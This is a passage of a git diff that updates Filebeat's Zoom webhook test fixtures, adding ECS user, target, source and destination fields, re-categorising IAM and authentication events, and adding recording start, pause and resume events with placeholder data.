+ { + "event.action": "chat_channel.member_left", + "event.dataset": "zoom.webhook", + "event.kind": [ + "event" + ], + "event.module": "zoom", + "event.timezone": "-02:00", + "event.type": [ + "user" + ], + "fileset.name": "webhook", + "input.type": "log", + "log.offset": 1603, + "observer.product": "Webhook", + "observer.vendor": "Zoom", + "related.user": [ + "z8dfgdfguQrdfgdf" + ], + "service.type": "zoom", + "tags": [ + "zoom-webhook", + "forwarded" + ], + "user.email": "somememai@gmtsffjdfhail.com", + "user.id": "z8dfgdfguQrdfgdf", "zoom.account_id": "vbbvnvAdsfe", "zoom.chat_channel.id": "6dfgdfgdg444447b0egga", "zoom.chat_channel.name": "Delivering Happiness", diff --git a/x-pack/filebeat/module/zoom/webhook/test/chat_message.ndjson.log-expected.json b/x-pack/filebeat/module/zoom/webhook/test/chat_message.ndjson.log-expected.json index 86cf03b64238..348ffc2bac6b 100644 --- a/x-pack/filebeat/module/zoom/webhook/test/chat_message.ndjson.log-expected.json +++ b/x-pack/filebeat/module/zoom/webhook/test/chat_message.ndjson.log-expected.json @@ -24,6 +24,8 @@ "zoom-webhook", "forwarded" ], + "user.email": "someoperatoremail@somekindofmailservice123.com", + "user.id": "zfdgdfgdfgfp8uQ", "zoom.account_id": "EPsdvdsgfdgxHMA", "zoom.chat_message.channel_id": "fsdgdgdgdfgdfgdfgdfgb10", "zoom.chat_message.channel_name": "AlwaysBeCodingChannel", @@ -59,6 +61,8 @@ "zoom-webhook", "forwarded" ], + "user.email": "someoperatoremail@somekindofmailservice123.com", + "user.id": "zfdgdfgdfgfp8uQ", "zoom.account_id": "EPsdvdsgfdgxHMA", "zoom.chat_message.channel_id": "fsdgdgdgdfgdfgdfgdfgb10", "zoom.chat_message.channel_name": "AlwaysBeCodingChannel", @@ -94,6 +98,8 @@ "zoom-webhook", "forwarded" ], + "user.email": "someoperatoremail@somekindofmailservice123.com", + "user.id": "zfdgdfgdfgfp8uQ", "zoom.account_id": "EPsdvdsgfdgxHMA", "zoom.chat_message.channel_id": "fsdgdgdgdfgdfgdfgdfgb10", "zoom.chat_message.channel_name": "AlwaysBeCodingChannel", diff --git a/x-pack/filebeat/module/zoom/webhook/test/meeting.ndjson.log-expected.json b/x-pack/filebeat/module/zoom/webhook/test/meeting.ndjson.log-expected.json index 858f739d55a4..123de911c51b 100644 --- a/x-pack/filebeat/module/zoom/webhook/test/meeting.ndjson.log-expected.json +++ b/x-pack/filebeat/module/zoom/webhook/test/meeting.ndjson.log-expected.json @@ -24,6 +24,7 @@ "zoom-webhook", "forwarded" ], + "user.id": "z8yCxTTTTSiw02QgCAp8uQ", "zoom.meeting.host_id": "z8yCxTTTTSiw02QgCAp8uQ", "zoom.meeting.id": "6962400003", "zoom.meeting.issues": "Unstable audio quality", @@ -52,7 +53,6 @@ "observer.product": "Webhook", "observer.vendor": "Zoom", "related.user": [ - "uLoRgfbbTayCX6r2Q_qQsQ", "uLoRgfbbTayCX6r2Q_qQsQ" ], "service.type": "zoom", @@ -60,6 +60,8 @@ "zoom-webhook", "forwarded" ], + "user.email": "someemail@email.com", + "user.id": "uLoRgfbbTayCX6r2Q_qQsQ", "zoom.account_id": "o8KK_AAACq6BBEyA70CA", "zoom.meeting.host_id": "uLoRgfbbTayCX6r2Q_qQsQ", "zoom.meeting.id": 111111111, @@ -98,6 +100,8 @@ "forwarded" ], "url.full": "https://zoom.us/j/00000000", + "user.email": "someemail@email.com", + "user.id": "BBBBBBBBBB", "zoom.account_id": "AAAAAAAAAAA", "zoom.meeting.id": 155184668, "zoom.meeting.start_time": "2019-07-11T20:00:00Z", @@ -133,7 +137,6 @@ "observer.product": "Webhook", "observer.vendor": "Zoom", "related.user": [ - "BBBBBBBBBB", "BBBBBBBBBB" ], "service.type": "zoom", @@ -141,6 +144,8 @@ "zoom-webhook", "forwarded" ], + "user.email": "someemail@email.com", + "user.id": "BBBBBBBBBB", "zoom.account_id": "AAAAAAAAAA", "zoom.meeting.host_id": "BBBBBBBBBB", "zoom.meeting.id": 809321987, @@ -178,6 +183,7 @@ "zoom-webhook", "forwarded" ], + "user.id": "uLoRgfbbTayCX6r2Q_qQsQ", "zoom.account_id": "o8KK_AAACq6BBEyA70CA", "zoom.meeting.host_id": "uLoRgfbbTayCX6r2Q_qQsQ", "zoom.meeting.id": "111111111", @@ -212,6 +218,7 @@ "zoom-webhook", "forwarded" ], + "user.id": "uLoRgfbbTayCX6r2Q_qQsQ", "zoom.account_id": "o8KK_AAACq6BBEyA70CA", "zoom.meeting.host_id": "uLoRgfbbTayCX6r2Q_qQsQ", "zoom.meeting.id": "111111111", @@ -248,6 +255,7 @@ "forwarded" ], "url.full": "https://zoom.us/w/someendpointhere", + "user.id": "uLobbbbbbbbbb_qQsQ", "zoom.account_id": "lAAAAAAAAAAAAA", "zoom.meeting.host_id": "uLobbbbbbbbbb_qQsQ", "zoom.meeting.id": 150000008, @@ -302,6 +310,8 @@ "zoom-webhook", "forwarded" ], + "user.email": "somemail@email.com", + "user.id": "Lobbbbbbbbbb_qQsQ", "zoom.account_id": "lAAAAAAAAAAAAA", "zoom.meeting.host_id": "uLobbbbbbbbbb_qQsQ", "zoom.meeting.id": 150000008, @@ -342,6 +352,7 @@ "zoom-webhook", "forwarded" ], + "user.id": "uLobbbbbbbbbb_qQsQ", "zoom.account_id": "lAAAAAAAAAAAAA", "zoom.meeting.host_id": "uLobbbbbbbbbb_qQsQ", "zoom.meeting.id": 150000008, @@ -375,6 +386,7 @@ "observer.product": "Webhook", "observer.vendor": "Zoom", "related.user": [ + "s0AAAASoSE1V8KIFOCYw", "z8yCxTTTTSiw02QgCAp8uQ" ], "service.type": "zoom", @@ -382,6 +394,8 @@ "zoom-webhook", "forwarded" ], + "user.full_name": "Arya Arya", + "user.id": "s0AAAASoSE1V8KIFOCYw", "zoom.account_id": "EPeQtiABC000VYxHMA", "zoom.meeting.host_id": "z8yCxTTTTSiw02QgCAp8uQ", "zoom.meeting.id": "6962400003", @@ -417,6 +431,7 @@ "observer.product": "Webhook", "observer.vendor": "Zoom", "related.user": [ + "s0AAAASoSE1V8KIFOCYw", "z8yCxTTTTSiw02QgCAp8uQ" ], "service.type": "zoom", @@ -424,6 +439,8 @@ "zoom-webhook", "forwarded" ], + "user.full_name": "Arya Arya", + "user.id": "s0AAAASoSE1V8KIFOCYw", "zoom.account_id": "EPeQtiABC000VYxHMA", "zoom.meeting.host_id": "z8yCxTTTTSiw02QgCAp8uQ", "zoom.meeting.id": "6962400003", @@ -466,6 +483,8 @@ "zoom-webhook", "forwarded" ], + "user.full_name": "Shrijana Shrijana", + "user.id": "z8yCxjjyTAAAA2QgCfp8uQ", "zoom.account_id": "EPeQti9EQsiyO30GVYxHMA", "zoom.meeting.host_id": "z8yCxjjyTAAAA2QgCfp8uQ", "zoom.meeting.id": "5590000000", @@ -500,6 +519,8 @@ "zoom-webhook", "forwarded" ], + "user.full_name": "Tom Harry", + "user.id": "zf8yCxjjyTSdteriw02QgCfp8uQ", "zoom.account_id": "APeeQti9ErttQsiyO30GVYxHMA", "zoom.meeting.host_id": "zf8yCxjjyTSdteriw02QgCfp8uQ", "zoom.meeting.id": "5594913504", @@ -527,6 +548,7 @@ "observer.product": "Webhook", "observer.vendor": "Zoom", "related.user": [ + "iFxeBPYun6SAiWUzBcEkX", "uLoRgfbbTayCX6r2Q_qQsQ" ], "service.type": "zoom", @@ -534,6 +556,8 @@ "zoom-webhook", "forwarded" ], + "user.full_name": "shree", + "user.id": "iFxeBPYun6SAiWUzBcEkX", "zoom.account_id": "o8KK_AAACq6BBEyA70CA", "zoom.meeting.host_id": "uLoRgfbbTayCX6r2Q_qQsQ", "zoom.meeting.id": "111111111", @@ -564,6 +588,7 @@ "observer.product": "Webhook", "observer.vendor": "Zoom", "related.user": [ + "iFxeBPYun6SAiWUzBcEkX", "uLoRgfbbTayCX6r2Q_qQsQ" ], "service.type": "zoom", @@ -571,6 +596,8 @@ "zoom-webhook", "forwarded" ], + "user.full_name": "shree", + "user.id": "iFxeBPYun6SAiWUzBcEkX", "zoom.account_id": "o8KK_AAACq6BBEyA70CA", "zoom.meeting.host_id": "uLoRgfbbTayCX6r2Q_qQsQ", "zoom.meeting.id": "111111111", diff --git a/x-pack/filebeat/module/zoom/webhook/test/phone.ndjson.log-expected.json b/x-pack/filebeat/module/zoom/webhook/test/phone.ndjson.log-expected.json index c5ef97dac473..507943735b29 100644 --- a/x-pack/filebeat/module/zoom/webhook/test/phone.ndjson.log-expected.json +++ b/x-pack/filebeat/module/zoom/webhook/test/phone.ndjson.log-expected.json @@ -20,6 +20,7 @@ "cadsd32wA" ], "service.type": "zoom", + "source.user.id": "cadsd32wA", "tags": [ "zoom-webhook", "forwarded" @@ -56,6 +57,7 @@ "cajhdsf3wA" ], "service.type": "zoom", + "source.user.id": "cajhdsf3wA", "tags": [ "zoom-webhook", "forwarded" @@ -93,6 +95,7 @@ "z8yCxjgjsuyd58uQ" ], "service.type": "zoom", + "source.user.id": "z8yCxjgjsuyd58uQ", "tags": [ "zoom-webhook", "forwarded" @@ -108,6 +111,7 @@ "zoom.phone.ringing_start_time": "2020-07-22T01:38:40Z" }, { + "destination.user.id": "z8yCDSSQWSSWuQ", "event.action": "phone.callee_answered", "event.dataset": "zoom.webhook", "event.kind": [ @@ -145,6 +149,7 @@ "zoom.phone.ringing_start_time": "2020-07-22T01:41:56Z" }, { + "destination.user.id": "z66jfgjdg2QgCfp8uQ", "event.action": "phone.callee_missed", "event.dataset": "zoom.webhook", "event.kind": [ @@ -178,6 +183,7 @@ "zoom.phone.caller.phone_number": "+1000000" }, { + "destination.user.id": "z66jfgjdg2QgCfp8uQ", "event.action": "phone.callee_ended", "event.dataset": "zoom.webhook", "event.duration": 4000000000, @@ -215,6 +221,7 @@ "zoom.phone.caller.phone_number": "+1000000" }, { + "destination.user.id": "z66jfgjdg2QgCfp8uQ", "event.action": "phone.caller_ended", "event.dataset": "zoom.webhook", "event.duration": 4000000000, @@ -252,6 +259,7 @@ "zoom.phone.caller.phone_number": "+1000000" }, { + "destination.user.id": "sfcg43FOCYw", "event.action": "phone.callee_rejected", "event.dataset": "zoom.webhook", "event.duration": 6000000000, @@ -288,6 +296,7 @@ "zoom.phone.ringing_start_time": "2020-07-22T21:06:33Z" }, { + "destination.user.id": "543234", "event.action": "phone.voicemail_received", "event.dataset": "zoom.webhook", "event.kind": [ diff --git a/x-pack/filebeat/module/zoom/webhook/test/recording.ndjson.log-expected.json b/x-pack/filebeat/module/zoom/webhook/test/recording.ndjson.log-expected.json index f7a97693de5e..f9be7349ab4f 100644 --- a/x-pack/filebeat/module/zoom/webhook/test/recording.ndjson.log-expected.json +++ b/x-pack/filebeat/module/zoom/webhook/test/recording.ndjson.log-expected.json @@ -1,4 +1,116 @@ [ + { + "event.action": "recording.started", + "event.dataset": "zoom.webhook", + "event.kind": [ + "event" + ], + "event.module": "zoom", + "event.start": "2019-07-31T22:41:02Z", + "event.timezone": "-02:00", + "event.type": [ + "info", + "start" + ], + "fileset.name": "webhook", + "input.type": "log", + "log.offset": 0, + "observer.product": "Webhook", + "observer.vendor": "Zoom", + "related.user": [ + "uLobbbbbbbbbb_qQsQ" + ], + "service.type": "zoom", + "tags": [ + "zoom-webhook", + "forwarded" + ], + "user.id": "uLobbbbbbbbbb_qQsQ", + "zoom.account_id": "lAAAAAAAAAAAAA", + "zoom.recording.duration": 1, + "zoom.recording.host_id": "uLobbbbbbbbbb_qQsQ", + "zoom.recording.id": 150000008, + "zoom.recording.recording_file.recording_start": "2019-07-31T22:41:02Z", + "zoom.recording.start_time": "2019-07-11T20:00:00Z", + "zoom.recording.timezone": "America/Los_Angeles", + "zoom.recording.topic": "A test meeting", + "zoom.recording.type": 2, + "zoom.recording.uuid": "dj12vck6sdTn6yy7qdy3dQg==" + }, + { + "event.action": "recording.paused", + "event.dataset": "zoom.webhook", + "event.kind": [ + "event" + ], + "event.module": "zoom", + "event.timezone": "-02:00", + "event.type": [ + "info", + "change" + ], + "fileset.name": "webhook", + "input.type": "log", + "log.offset": 359, + "observer.product": "Webhook", + "observer.vendor": "Zoom", + "related.user": [ + "uLobbbbbbbbbb_qQsQ" + ], + "service.type": "zoom", + "tags": [ + "zoom-webhook", + "forwarded" + ], + "user.id": "uLobbbbbbbbbb_qQsQ", + "zoom.account_id": "lAAAAAAAAAAAAA", + "zoom.recording.duration": 1, + "zoom.recording.host_id": "uLobbbbbbbbbb_qQsQ", + "zoom.recording.id": 150000008, + "zoom.recording.recording_file.recording_start": "2019-07-31T22:41:02Z", + "zoom.recording.start_time": "2019-07-11T20:00:00Z", + "zoom.recording.timezone": "America/Los_Angeles", + "zoom.recording.topic": "A test meeting", + "zoom.recording.type": 2, + "zoom.recording.uuid": "dj12vck6sdTn6yy7qdy3dQg==" + }, + { + "event.action": "recording.resumed", + "event.dataset": "zoom.webhook", + "event.kind": [ + "event" + ], + "event.module": "zoom", + "event.timezone": "-02:00", + "event.type": [ + "info", + "change" + ], + "fileset.name": "webhook", + "input.type": "log", + "log.offset": 717, + "observer.product": "Webhook", + "observer.vendor": "Zoom", + "related.user": [ + "uLobbbbbbbbbb_qQsQ" + ], + "service.type": "zoom", + "tags": [ + "zoom-webhook", + "forwarded" + ], + "user.id": "uLobbbbbbbbbb_qQsQ", + "zoom.account_id": "lAAAAAAAAAAAAA", + "zoom.recording.duration": 1, + "zoom.recording.host_id": "uLobbbbbbbbbb_qQsQ", + "zoom.recording.id": 150000008, + "zoom.recording.recording_file.recording_start": "2019-07-31T22:45:02Z", + "zoom.recording.start_time": "2019-07-11T20:00:00Z", + "zoom.recording.timezone": "America/Los_Angeles", + "zoom.recording.topic": "A test meeting", + "zoom.recording.type": 2, + "zoom.recording.uuid": "dj12vck6sdTn6yy7qdy3dQg==" + }, { "event.action": "recording.stopped", "event.dataset": "zoom.webhook", @@ -25,6 +137,7 @@ "zoom-webhook", "forwarded" ], + "user.id": "uLobbbbbbbbbb_qQsQ", "zoom.account_id": "lAAAAAAAAAAAAA", "zoom.recording.duration": 8, "zoom.recording.host_id": "uLobbbbbbbbbb_qQsQ", @@ -63,6 +176,7 @@ "forwarded" ], "url.full": "https://zoom.us/recording/share/aaaaaannnnnldglrkgmrmhh", + "user.id": "uLobbbbbbbbbb_qQsQ", "zoom.account_id": "lAAAAAAAAAAAAA", "zoom.recording.duration": 1, "zoom.recording.host_email": "somemeail@someemailservice.fjdjf", @@ -101,6 +215,8 @@ "zoom-webhook", "forwarded" ], + "user.email": "shrifdfdh@kjdmail.com", + "user.id": "zdhghgCfp8uQ", "zoom.account_id": "EPhgfhfghfYxHMA", "zoom.old_values.id": 7000000, "zoom.old_values.topic": "My Fancy Recording Title", @@ -139,6 +255,7 @@ "forwarded" ], "url.full": "https://zoom.us/recording/share/aaaaaannnnnldglrkgmrmhh", + "user.id": "uLobbbbbbbbbb_qQsQ", "zoom.account_id": "lAAAAAAAAAAAAA", "zoom.recording.duration": 1, "zoom.recording.host_id": "uLobbbbbbbbbb_qQsQ", @@ -177,6 +294,7 @@ "forwarded" ], "url.full": "https://zoom.us/recording/share/aaaaaannnnnldglrkgmrmhh", + "user.id": "uLobbbbbbbbbb_qQsQ", "zoom.account_id": "lAAAAAAAAAAAAA", "zoom.recording.duration": 1, "zoom.recording.host_id": "uLobbbbbbbbbb_qQsQ", @@ -215,6 +333,7 @@ "forwarded" ], "url.full": "https://zoom.us/recording/share/aaaaaannnnnldglrkgmrmhh", + "user.id": "uLobbbbbbbbbb_qQsQ", "zoom.account_id": "lAAAAAAAAAAAAA", "zoom.recording.duration": 1, "zoom.recording.host_id": "uLobbbbbbbbbb_qQsQ", @@ -253,6 +372,7 @@ "forwarded" ], "url.full": "https://zoom.us/recording/share/aaaaaannnnnldglrkgmrmhh", + "user.id": "uLobbbbbbbbbb_qQsQ", "zoom.account_id": "lAAAAAAAAAAAAA", "zoom.recording.duration": 1, "zoom.recording.host_id": "uLobbbbbbbbbb_qQsQ", @@ -283,13 +403,17 @@ "observer.product": "Webhook", "observer.vendor": "Zoom", "related.user": [ - "uLobbbbbbbbbb_qQsQ" + "uLobbbbbbbbbb_qQsQ", + "U0BBBBBBBBBBfrUz1Q" ], "service.type": "zoom", "tags": [ "zoom-webhook", "forwarded" ], + "user.email": "coolemail@email.com", + "user.full_name": "Cool Person", + "user.id": "U0BBBBBBBBBBfrUz1Q", "zoom.account_id": "lAAAAAAAAAAAAA", "zoom.recording.duration": 120, "zoom.recording.host_id": "uLobbbbbbbbbb_qQsQ", @@ -322,13 +446,17 @@ "observer.product": "Webhook", "observer.vendor": "Zoom", "related.user": [ - "uLobbbbbbbbbb_qQsQ" + "uLobbbbbbbbbb_qQsQ", + "U0BBBBBBBBBBfrUz1Q" ], "service.type": "zoom", "tags": [ "zoom-webhook", "forwarded" ], + "user.email": "coolemail@email.com", + "user.full_name": "Cool Person", + "user.id": "U0BBBBBBBBBBfrUz1Q", "zoom.account_id": "lAAAAAAAAAAAAA", "zoom.recording.duration": 120, "zoom.recording.host_id": "uLobbbbbbbbbb_qQsQ", @@ -361,13 +489,17 @@ "observer.product": "Webhook", "observer.vendor": "Zoom", "related.user": [ - "uLobbbbbbbbbb_qQsQ" + "uLobbbbbbbbbb_qQsQ", + "U0BBBBBBBBBBfrUz1Q" ], "service.type": "zoom", "tags": [ "zoom-webhook", "forwarded" ], + "user.email": "coolemail@email.com", + "user.full_name": "Cool Person", + "user.id": "U0BBBBBBBBBBfrUz1Q", "zoom.account_id": "lAAAAAAAAAAAAA", "zoom.recording.duration": 120, "zoom.recording.host_id": "uLobbbbbbbbbb_qQsQ", diff --git a/x-pack/filebeat/module/zoom/webhook/test/user.ndjson.log-expected.json b/x-pack/filebeat/module/zoom/webhook/test/user.ndjson.log-expected.json index 3921a3c71041..f643dda0471b 100644 --- a/x-pack/filebeat/module/zoom/webhook/test/user.ndjson.log-expected.json +++ b/x-pack/filebeat/module/zoom/webhook/test/user.ndjson.log-expected.json @@ -1,15 +1,15 @@ [ { "event.action": "user.created", + "event.category": [ + "iam" + ], "event.dataset": "zoom.webhook", "event.kind": [ "event" ], "event.module": "zoom", "event.timezone": "-02:00", - "event.type": [ - "iam" - ], "fileset.name": "webhook", "input.type": "log", "log.offset": 0, @@ -23,6 +23,10 @@ "zoom-webhook", "forwarded" ], + "user.email": "anawesomeuser@email.com", + "user.target.email": "henrysemail@email.com", + "user.target.full_name": "Henry Phan", + "user.target.id": "abcD3ojfdbjfg", "zoom.account_id": "AAAAAA", "zoom.creation_type": "create", "zoom.operator": "anawesomeuser@email.com", @@ -34,6 +38,9 @@ }, { "event.action": "user.invitation_accepted", + "event.category": [ + "iam" + ], "event.dataset": "zoom.webhook", "event.kind": [ "event" @@ -41,7 +48,6 @@ "event.module": "zoom", "event.timezone": "-02:00", "event.type": [ - "iam", "creation" ], "fileset.name": "webhook", @@ -57,6 +63,9 @@ "zoom-webhook", "forwarded" ], + "user.email": "maria@maria.developer.dfgfdgf", + "user.full_name": "Maria CoolPerson", + "user.id": "sbyjt3ODg", "zoom.account_id": "EPjyjVYxHMA", "zoom.user.email": "maria@maria.developer.dfgfdgf", "zoom.user.first_name": "Maria", @@ -66,6 +75,9 @@ }, { "event.action": "user.updated", + "event.category": [ + "iam" + ], "event.dataset": "zoom.webhook", "event.kind": [ "event" @@ -73,7 +85,6 @@ "event.module": "zoom", "event.timezone": "-02:00", "event.type": [ - "iam", "creation", "change" ], @@ -91,6 +102,9 @@ "zoom-webhook", "forwarded" ], + "user.email": "shrija2016+dev_ma@gmail.com", + "user.id": "uLobbbbbbbb_qQsQ", + "user.target.id": "uLobbbbbbbb_qQsQ", "zoom.account_id": "lAA_EBBBBBBB", "zoom.old_values.company": "NotZoom", "zoom.old_values.id": "uLobbbbbbbb_qQsQ", @@ -102,7 +116,8 @@ { "event.action": "user.settings_updated", "event.category": [ - "configuration" + "configuration", + "iam" ], "event.dataset": "zoom.webhook", "event.kind": [ @@ -111,7 +126,6 @@ "event.module": "zoom", "event.timezone": "-02:00", "event.type": [ - "iam", "creation", "change" ], @@ -129,6 +143,9 @@ "zoom-webhook", "forwarded" ], + "user.email": "iamtheoperator@gmail.com", + "user.id": "uLoRgfbbTayCX6r2Q_qQsQ", + "user.target.id": "uL34AAbbbbAAAAAAQsQ", "zoom.account_id": "CAl6ByEyAq8KK_CCCCCC", "zoom.old_values.id": "uL34AAbbbbAAAAAAQsQ", "zoom.old_values.settings.in_meeting.private_chat": true, @@ -140,7 +157,8 @@ { "event.action": "user.settings_updated", "event.category": [ - "configuration" + "configuration", + "iam" ], "event.dataset": "zoom.webhook", "event.kind": [ @@ -149,7 +167,6 @@ "event.module": "zoom", "event.timezone": "-02:00", "event.type": [ - "iam", "creation", "change" ], @@ -167,6 +184,9 @@ "zoom-webhook", "forwarded" ], + "user.email": "somememail@randommailer28.com", + "user.id": "fdhjfdhsj536274gfd", + "user.target.id": "fdhjfdhsj536274gfd", "zoom.account_id": "EPbbbbb@@@@@2sfdfdA", "zoom.old_values.id": "fdhjfdhsj536274gfd", "zoom.old_values.settings.meeting_authentication": true, @@ -177,6 +197,9 @@ }, { "event.action": "user.deactivated", + "event.category": [ + "iam" + ], "event.dataset": "zoom.webhook", "event.kind": [ "event" @@ -184,7 +207,6 @@ "event.module": "zoom", "event.timezone": "-02:00", "event.type": [ - "iam", "creation", "change" ], @@ -202,6 +224,11 @@ "zoom-webhook", "forwarded" ], + "user.email": "anawesomeuser@email.com", + "user.id": "z8yCxjabcdEFGHfp8uQ", + "user.target.email": "henrysemail@email.com", + "user.target.full_name": "Henry Phan", + "user.target.id": "abcD3ojfdbjfg", "zoom.account_id": "AAAAAABBBB", "zoom.operator": "anawesomeuser@email.com", "zoom.operator_id": "z8yCxjabcdEFGHfp8uQ", @@ -213,6 +240,9 @@ }, { "event.action": "user.activated", + "event.category": [ + "iam" + ], "event.dataset": "zoom.webhook", "event.kind": [ "event" @@ -220,7 +250,6 @@ "event.module": "zoom", "event.timezone": "-02:00", "event.type": [ - "iam", "creation", "change" ], @@ -238,6 +267,11 @@ "zoom-webhook", "forwarded" ], + "user.email": "anawesomeuser@email.com", + "user.id": "z8yCxjabcdEFGHfp8uQ", + "user.target.email": "henrysemail@email.com", + "user.target.full_name": "Henry Phan", + "user.target.id": "abcD3ojfdbjfg", "zoom.account_id": "AAAAAABBBB", "zoom.operator": "anawesomeuser@email.com", "zoom.operator_id": "z8yCxjabcdEFGHfp8uQ", @@ -249,6 +283,9 @@ }, { "event.action": "user.disassociated", + "event.category": [ + "iam" + ], "event.dataset": "zoom.webhook", "event.kind": [ "event" @@ -256,7 +293,6 @@ "event.module": "zoom", "event.timezone": "-02:00", "event.type": [ - "iam", "creation", "change" ], @@ -274,6 +310,11 @@ "zoom-webhook", "forwarded" ], + "user.email": "anawesomeuser@email.com", + "user.id": "z8yCxjabcdEFGHfp8uQ", + "user.target.email": "henrysemail@email.com", + "user.target.full_name": "Henry Phan", + "user.target.id": "abcD3ojfdbjfg", "zoom.account_id": "AAAAAABBBB", "zoom.operator": "anawesomeuser@email.com", "zoom.operator_id": "z8yCxjabcdEFGHfp8uQ", @@ -285,6 +326,9 @@ }, { "event.action": "user.deleted", + "event.category": [ + "iam" + ], "event.dataset": "zoom.webhook", "event.kind": [ "event" @@ -292,7 +336,6 @@ "event.module": "zoom", "event.timezone": "-02:00", "event.type": [ - "iam", "creation", "deletion" ], @@ -310,6 +353,11 @@ "zoom-webhook", "forwarded" ], + "user.email": "anawesomeuser@email.com", + "user.id": "z8yCxjabcdEFGHfp8uQ", + "user.target.email": "henrysemail@email.com", + "user.target.full_name": "Henry Phan", + "user.target.id": "abcD3ojfdbjfg", "zoom.account_id": "AAAAAABBBB", "zoom.operator": "anawesomeuser@email.com", "zoom.operator_id": "z8yCxjabcdEFGHfp8uQ", @@ -321,6 +369,9 @@ }, { "event.action": "user.presence_status_updated", + "event.category": [ + "iam" + ], "event.dataset": "zoom.webhook", "event.kind": [ "event" @@ -328,7 +379,6 @@ "event.module": "zoom", "event.timezone": "-02:00", "event.type": [ - "iam", "creation", "change" ], @@ -345,6 +395,8 @@ "zoom-webhook", "forwarded" ], + "user.email": "sfdhfghfgh@dkjdfd.com", + "user.id": "z8ycx1223fq", "zoom.account_id": "EPjfyjxHMA", "zoom.user.email": "sfdhfghfgh@dkjdfd.com", "zoom.user.id": "z8ycx1223fq", @@ -352,6 +404,9 @@ }, { "event.action": "user.personal_notes_updated", + "event.category": [ + "iam" + ], "event.dataset": "zoom.webhook", "event.kind": [ "event" @@ -359,7 +414,6 @@ "event.module": "zoom", "event.timezone": "-02:00", "event.type": [ - "iam", "creation", "change" ], @@ -376,6 +430,10 @@ "zoom-webhook", "forwarded" ], + "user.email": "sdfsgdfg@fjghg.ghm", + "user.id": "z8aggp8uq", + "user.target.email": "sdfsgdfg@fjghg.ghm", + "user.target.id": "z8aggp8uq", "zoom.account_id": "EPfhhdrYxHMA", "zoom.old_values.personal_notes": "this is the old note", "zoom.user.email": "sdfsgdfg@fjghg.ghm", @@ -384,6 +442,9 @@ }, { "event.action": "user.signed_in", + "event.category": [ + "authentication" + ], "event.dataset": "zoom.webhook", "event.kind": [ "event" @@ -391,7 +452,6 @@ "event.module": "zoom", "event.timezone": "-02:00", "event.type": [ - "authentication", "creation", "start" ], @@ -408,6 +468,8 @@ "zoom-webhook", "forwarded" ], + "user.email": "awesomeuser@awesomemeail.ghkgf", + "user.id": "djkglfdgkjdflghfdpe", "zoom.account_id": "dsjfosdfpdosgifdjg", "zoom.user.client_type": "android", "zoom.user.email": "awesomeuser@awesomemeail.ghkgf", @@ -416,6 +478,9 @@ }, { "event.action": "user.signed_out", + "event.category": [ + "authentication" + ], "event.dataset": "zoom.webhook", "event.kind": [ "event" @@ -423,7 +488,6 @@ "event.module": "zoom", "event.timezone": "-02:00", "event.type": [ - "authentication", "creation", "end" ], @@ -440,6 +504,8 @@ "zoom-webhook", "forwarded" ], + "user.email": "awesomeuser@awesomemeail.ghkgf", + "user.id": "djkglfdgkjdflghfdpe", "zoom.account_id": "dsjfosdfpdosgifdjg", "zoom.user.client_type": "android", "zoom.user.email": "awesomeuser@awesomemeail.ghkgf", diff --git a/x-pack/filebeat/module/zoom/webhook/test/webinar.ndjson.log-expected.json b/x-pack/filebeat/module/zoom/webhook/test/webinar.ndjson.log-expected.json index 1bef0aa4e152..0c59a8beb21a 100644 --- a/x-pack/filebeat/module/zoom/webhook/test/webinar.ndjson.log-expected.json +++ b/x-pack/filebeat/module/zoom/webhook/test/webinar.ndjson.log-expected.json @@ -17,7 +17,6 @@ "observer.product": "Webhook", "observer.vendor": "Zoom", "related.user": [ - "uLoRgfbbTayCX6r2Q_qQsQ", "uLoRgfbbTayCX6r2Q_qQsQ" ], "service.type": "zoom", @@ -25,6 +24,8 @@ "zoom-webhook", "forwarded" ], + "user.email": "someemail@email.com", + "user.id": "uLoRgfbbTayCX6r2Q_qQsQ", "zoom.account_id": "o8KK_AAACq6BBEyA70CA", "zoom.operator": "someemail@email.com", "zoom.operator_id": "uLoRgfbbTayCX6r2Q_qQsQ", @@ -62,6 +63,8 @@ "zoom-webhook", "forwarded" ], + "user.email": "someemail@email.com", + "user.id": "BBBBBBBBBB", "zoom.account_id": "AAAAAAAAAAA", "zoom.old_values.id": 155184668, "zoom.old_values.join_url": "https://zoom.us/j/00000000", @@ -97,7 +100,6 @@ "observer.product": "Webhook", "observer.vendor": "Zoom", "related.user": [ - "uLoRgfbbTayCX6r2Q_qQsQ", "uLoRgfbbTayCX6r2Q_qQsQ" ], "service.type": "zoom", @@ -105,6 +107,8 @@ "zoom-webhook", "forwarded" ], + "user.email": "someemail@email.com", + "user.id": "uLoRgfbbTayCX6r2Q_qQsQ", "zoom.account_id": "o8KK_AAACq6BBEyA70CA", "zoom.operator": "someemail@email.com", "zoom.operator_id": "uLoRgfbbTayCX6r2Q_qQsQ", @@ -142,6 +146,7 @@ "zoom-webhook", "forwarded" ], + "user.email": "someemail@email.com", "zoom.account_id": "o8KK_AAACq6BBEyA70CA", "zoom.operator": "someemail@email.com", "zoom.webinar.duration": 0, @@ -178,6 +183,7 @@ "zoom-webhook", "forwarded" ], + "user.email": "someemail@email.com", "zoom.account_id": "o8KK_AAACq6BBEyA70CA", "zoom.operator": "someemail@email.com", "zoom.webinar.duration": 0, @@ -241,13 +247,16 @@ "observer.product": "Webhook", "observer.vendor": "Zoom", "related.user": [ - "z8yCxTTTTSiw02QgCAp8uQ" + "z8yCxTTTTSiw02QgCAp8uQ", + "s0AAAASoSE1V8KIFOCYw" ], "service.type": "zoom", "tags": [ "zoom-webhook", "forwarded" ], + "user.full_name": "Arya Arya", + "user.id": "s0AAAASoSE1V8KIFOCYw", "zoom.account_id": "EPeQtiABC000VYxHMA", "zoom.participant.id": "s0AAAASoSE1V8KIFOCYw", "zoom.participant.sharing_details.content": "application", @@ -284,13 +293,16 @@ "observer.product": "Webhook", "observer.vendor": "Zoom", "related.user": [ - "z8yCxTTTTSiw02QgCAp8uQ" + "z8yCxTTTTSiw02QgCAp8uQ", + "s0AAAASoSE1V8KIFOCYw" ], "service.type": "zoom", "tags": [ "zoom-webhook", "forwarded" ], + "user.full_name": "Arya Arya", + "user.id": "s0AAAASoSE1V8KIFOCYw", "zoom.account_id": "EPeQtiABC000VYxHMA", "zoom.participant.id": "s0AAAASoSE1V8KIFOCYw", "zoom.participant.sharing_details.content": "application", @@ -327,13 +339,17 @@ "observer.product": "Webhook", "observer.vendor": "Zoom", "related.user": [ - "uLobbbbbbbbbb_qQsQ" + "uLobbbbbbbbbb_qQsQ", + "U0BBBBBBBBBBfrUz1Q" ], "service.type": "zoom", "tags": [ 